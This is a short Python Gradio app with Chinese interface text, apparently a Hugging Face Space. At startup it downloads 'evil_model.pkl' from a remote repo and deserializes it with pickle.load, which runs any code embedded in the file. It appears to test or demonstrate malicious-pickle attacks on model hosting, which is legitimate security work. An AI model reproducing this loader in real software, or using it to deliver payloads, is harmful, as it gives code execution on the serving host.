|
import gradio as gr |
|
from huggingface_hub import hf_hub_download |
|
import pickle |
|
import os |
|
|
|
|
|
def load_pickled_object(repo_id: str, filename: str): |
|
|
|
cache_dir = os.path.join(".cache", repo_id.replace("/", "_")) |
|
os.makedirs(cache_dir, exist_ok=True) |
|
local_path = hf_hub_download( |
|
repo_id=repo_id, |
|
filename=filename, |
|
cache_dir=cache_dir, |
|
force_download=False |
|
) |
|
|
|
with open(local_path, "rb") as f: |
|
obj = pickle.load(f) |
|
return obj |
|
|
|
|
|
|
|
MODEL_REPO = "szk2024/test" |
|
MODEL_FILE = "evil_model.pkl" |
|
|
|
try: |
|
model = load_pickled_object(MODEL_REPO, MODEL_FILE) |
|
except Exception as e: |
|
|
|
print("❌ 模型加载失败:", e) |
|
model = None |
|
|
|
|
|
def predict(text: str): |
|
if model is None: |
|
return "模型加载失败,请检查日志" |
|
|
|
try: |
|
res = model.predict([text]) |
|
return str(res) |
|
except Exception as e: |
|
return f"预测失败:{e}" |
|
|
|
|
|
iface = gr.Interface( |
|
fn=predict, |
|
inputs=gr.Textbox(lines=2, placeholder="在此输入内容…"), |
|
outputs="text", |
|
title="Pickle 模型调用示例", |
|
description="从 Hugging Face Hub 下载 pickle 并反序列化后预测" |
|
) |
|
|
|
if __name__ == "__main__": |
|
iface.launch(server_name="0.0.0.0", server_port=7860) |
|
|